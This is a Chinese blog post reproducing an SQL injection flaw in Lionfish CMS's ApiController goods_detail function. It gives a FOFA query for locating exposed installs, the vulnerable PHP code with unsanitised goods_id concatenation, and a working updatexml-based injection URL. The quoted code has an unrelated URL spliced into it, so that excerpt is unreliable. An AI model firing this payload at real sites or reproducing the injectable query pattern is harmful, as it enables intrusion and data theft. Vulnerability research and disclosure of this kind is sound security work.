狮子鱼 CMS ApiController.class.php SQL 注入漏洞

已于 2024-08-04 18:15:54 修改
阅读量208 收藏 5
点赞数 10
分类专栏: 漏洞复现 文章标签: php 安全 开发语言
于 2024-08-04 18:06:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/140909278
版权
本章提供的所有内容仅供学习、交流和分享用途,只供参考。本站资源禁止并谢绝未经本站许可的使用,如若欲转载,请署名以及注明出处,请务必以文字链接的形式标明或保留文章原始出处和作者的信息。本站(原创)文章、资源、图片等所有内容,一经转载,即表示您已经接受上述声明!需自行承担一切风险与责任;
漏洞描述

狮子鱼 CMS ApiController.class.php 参数过滤存在不严谨,导致 SQL 注入漏洞

漏洞影响

狮子鱼CMS

FOFA
"/seller.php?s=/Public/login"
漏洞复现

登录界面如下

 poc

存在漏洞的文件为 ApiController.class.php , 关键位置为

public function goods_detail()
{
    $goods_id = I('get.goods_id');
    //gallery =>img_url
    //goods goods.goods_desc goods_name group_price market_price sell_count group_number

    $sql="select g.*,gd.description,gd.summary,gd.tag from ".
    C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description
    
    gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;

    $goods_arr=M()->query($sql);

    $qian=array("
");
    $hou=array("<br/>");
    $goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']);

    $sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
    $goods_image=M()->query($sql);

    $gallery = array();
    $default_image = '';
    foreach($goods_image as $val)
    {
        $val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/ http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vul n/'.$val['image'];

        if(empty($default_image))
        {
            $default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
        }

        $gallery[] = array('img_url' => $val['img_url']);
    }

    $goods = $goods_arr[0];
}
漏洞测试为 
https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20 updatexml(1,concat(0x7e,md5(1),0x7e),1)
图片显示 

 文章内容源

http://www.wwlib.cn/index.php/artread/artid/10227.html

天官赐福万无禁忌
关注
专栏目录
漏洞复现】狮子CMSSQL注入漏洞
晚风不及你
02-09 1373
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
【1day】狮子CMS注入漏洞学习(2个)
记录并分享学习安全的知识点..
07-07 1157
狮子CMS注入漏洞学习
狮子cms-sql注入漏洞复现
weixin_68647219的博客
09-06 2903
工作发现,狮子cms存在sql注入漏洞,该漏洞是由于狮子CMS ApiController.class.php 参数过滤存在不严谨可能导致SQL注入漏洞
狮子cms-SQL注入
weixin_46663238的博客
10-20 2249
狮子CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //go...
狮子SQL注入漏洞复现
花开烟雨楼的博客
03-23 1459
狮子CMS是一款管理系统。在 ApiController.class.php处 参数过滤存在不严谨,导致SQL注入漏洞
靶场上新:狮子CMS前台SQL注入
2301_80115097的博客
10-30 235
狮子CMS ApiController.class.php 因参数过滤存在不严谨,导致SQL注入漏洞。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。狮子CMS是以小程序为载体,快速搭建社区社群社交资源的社区团购平台,用于帮助商家集中运营管理。所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,(私聊进群一起学习,共同进步)帮助你在面试中脱颖而出。
漏洞复现】狮子CMSSQL注入漏洞01
晚风不及你
02-09 1174
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
狮子CMS image_upload.php 任意文件上传
孤桜懶契
03-29 4494
漏洞描述 网站系统为狮子社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中两个文件上传漏洞漏洞复现以及漏洞工具分享。 漏洞影响 s ✅狮子CMS 空间测绘 d ⭕FOFA:"/seller.php?s=/Public/login" 漏洞复现 POC POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 Host: ip Content-Type
[漏洞挖掘]SRC-狮子CMS-SQL注入
wwxxee
05-20 7604
狮子cms-SQL注入 狮子CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url /
漏洞复现】狮子CMS文件上传漏洞(wxapp.php)
晚风不及你
02-11 1443
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
poc-狮子cms
m0_55772907的博客
10-19 880
渗透
狮子社区团购系统CMS任意文件2处上传漏洞
赵一舟的博客
06-09 3586
漏洞复现 FOFA语句 "/seller.php?s=/Public/login" POC1 POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 213 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: mul.
开发实战(6)--对fofa收集的漏洞资产使用poc进行批量验证
记录开发和安全学习过程中的点点滴滴
04-21 1417
对收集的漏洞信息进行批量监测的一个通用脚本,本质是可以做一个通用的漏洞批量监测的通用模板,可惜的是没有成功获得可以进行测试的weblogic的资产,但是还是发现狮子确实漏洞资产很多可以进行验证.t=N7T8t=N7T8安全开发实战http://t.csdnimg.cn/Ba4Ru。
实战SRC | 某站点后台管理系统SQL注入
zkaqlaoniao的博客
01-03 439
在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点。直接去百度一手,发现有个SQL注入还有其他的漏洞,打算一个一个尝试看看。所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.申明:本文所分享内容仅用于网络安全技术讨论,切勿用于违法途径,本文由掌控安全学院 - 会唱会跳会敲键盘 投稿。OK,成功爆破出数据库名,SQL注入一枚到手~网站后台很像cms搭建的,在查看网站时发现。典型的狮子cms的特征!
组件Fofa
最新发布
weixin_68416970的博客
08-02 692
fofa搜索引擎的部分组件和网络测绘命令
day50.品优购电商,springSecurity安全框架,运营商登陆与安全控制功能,商家的入驻和审核
qq847196660的博客
09-28 343
什么是springSecurity安全框架: springSecurity是spring这个组织生产的一个安全框架, 也就是权限管理框架 作用: 将springSecurity集成到我们系统中, 我们就可以用它来完成系统的权限控制管理. a) 用户名, 密码认证(判断用户名密码是否正确) b) 授权: 给予登录用户对应的访问权限. 注意: 1. 登录页面提交用户名密码表单路径必须叫做/login ...
商家系统登录与安全控制
huangyh技术栈
11-24 999
1.1 实现步骤分析 明确需求:完成商家系统登录与安全控制,商家账号来自数据库,并实现密码加密。 简单分析:认证的提供者不能使用用户服务,而是来自数据库表。先整合SpringSecurity(配置依赖Jar包、web.xml配置文件、applicationContext-security.xml配置文件) 自定义认证类,在web层创建UserDetailsServiceImpl.java认...
css改变.class的颜色
06-09
你可以使用 CSS 中的 color 属性来改变一个 class 的颜色。你可以在 CSS 文件中使用以下代码: ```css .my-class { color: red; } ``` 这将会把所有使用 class 为 "my-class" 的元素的文本颜色变成红色。你也可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值